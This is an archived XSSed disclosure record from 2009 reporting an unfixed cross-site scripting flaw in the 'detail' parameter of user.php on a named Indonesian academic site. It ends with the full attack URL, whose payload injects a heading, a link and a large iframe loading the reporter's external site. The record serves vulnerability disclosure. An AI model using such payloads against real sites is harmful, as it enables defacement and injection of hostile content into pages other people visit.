Unfixed XSS vulnerability at www.atk.ac.id

2009-03-27T00:00:00
ID XSSED:59163
Type xssed
Reporter SPYRO KiD
Modified 2009-05-27T00:00:00

Description

Security researcher SPYRO KiD, has submitted on 27/03/2009 a cross-site-scripting (XSS) vulnerability affecting www.atk.ac.id, which at the time of submission ranked 1165578 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/05/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.atk.ac.id/user.php?detail=<center><h1>XSSED by SPYRO KiD<br><ahref=http://spyrozone.net>http://spyrozone.net</a></h1><br><iframe width=800 height=600src=http://spyrozone.net></iframe>